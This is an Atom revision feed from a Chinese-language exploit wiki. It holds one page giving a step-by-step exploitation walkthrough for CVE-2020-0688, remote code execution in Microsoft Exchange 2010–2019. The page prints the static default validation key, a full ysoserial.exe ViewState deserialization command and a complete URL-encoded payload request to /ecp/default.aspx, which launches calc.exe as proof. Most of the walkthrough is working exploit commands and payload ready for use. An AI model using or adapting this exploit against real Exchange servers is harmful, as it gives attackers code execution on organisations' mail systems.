<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-0688_%E5%BE%AE%E8%BB%9FEXCHANGE%E6%9C%8D%E5%8B%99%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2020-0688 微軟EXCHANGE服務遠程代碼執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2020-0688_%E5%BE%AE%E8%BB%9FEXCHANGE%E6%9C%8D%E5%8B%99%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-0688_%E5%BE%AE%E8%BB%9FEXCHANGE%E6%9C%8D%E5%8B%99%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-15T08:41:31Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2020-0688_%E5%BE%AE%E8%BB%9FEXCHANGE%E6%9C%8D%E5%8B%99%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1654&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==影響版本== exchange 2010、2013、2016、2019  ==漏洞利用== 1、獲取ViewStateUserKey值 &lt;pre&gt; /ecp/default.aspx &lt;/pre&gt; F12打開開發工具的Network選項，然...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2020-0688_%E5%BE%AE%E8%BB%9FEXCHANGE%E6%9C%8D%E5%8B%99%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1654&amp;oldid=prev"/>
		<updated>2021-04-14T07:55:22Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==影響版本== exchange 2010、2013、2016、2019  ==漏洞利用== 1、獲取ViewStateUserKey值 &amp;lt;pre&amp;gt; /ecp/default.aspx &amp;lt;/pre&amp;gt; F12打開開發工具的Network選項，然...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==影響版本==&lt;br /&gt;
exchange 2010、2013、2016、2019&lt;br /&gt;
&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
1、獲取ViewStateUserKey值&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/ecp/default.aspx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
F12打開開發工具的Network選項，然後按F5重新發送請求。我們需要找到/ecp/default.aspx的響應（NET_SessionId）&lt;br /&gt;
&lt;br /&gt;
2、獲取取VIEWSTATEGENERATOR值：&lt;br /&gt;
同樣在/ecp/default.aspx的響應包內，直接搜索關鍵詞即可。&lt;br /&gt;
&lt;br /&gt;
或使用document.getElementById(&amp;quot;VIEWSTATEGENERATOR&amp;quot;).value&lt;br /&gt;
&lt;br /&gt;
如果發現沒有改字段，是因為系統沒有安裝KB2919355補丁，更新該補丁後可顯示，但是該字段值基本唯一，不需要刻意獲得。&lt;br /&gt;
&lt;br /&gt;
3.整理已知參數&lt;br /&gt;
--validationkey = CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF（默認，漏洞產生原因）&lt;br /&gt;
--validationalg = SHA1（默認，漏洞產生原因）&lt;br /&gt;
--generator = B97B4E27（基本默認）&lt;br /&gt;
--viewstateuserkey = d673d1a4-1794-403e-ab96-e283ca880ef2（手工獲取，變量，每次登陸都不一致）&lt;br /&gt;
&lt;br /&gt;
4.生成payload:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c &amp;quot;calc.exe&amp;quot; --validationalg=&amp;quot;SHA1&amp;quot; --validationkey=&amp;quot;CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF&amp;quot; --generator=&amp;quot;B97B4E27&amp;quot; --viewstateuserkey=&amp;quot;d673d1a4-1794-403e-ab96-e283ca880ef2&amp;quot; --isdebug --islegacy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
上面ysoserial.exe生成的payload要用URL Encode編碼&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
完整示例：&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
https://192.168.1.248/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&amp;amp;__VIEWSTATE=%2FwEyhAYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACmBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BY2FsYy5leGU8L1N5c3RlbTpTdHJpbmc%2BDQogICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2BDQogICAgPC9PYmplY3REYXRhUHJvdmlkZXI%2BDQo8L1Jlc291cmNlRGljdGlvbmFyeT4Lp73ado0NJN2PSSnfOoN9h4H7xCU%3D&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
成功彈出計算器。&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>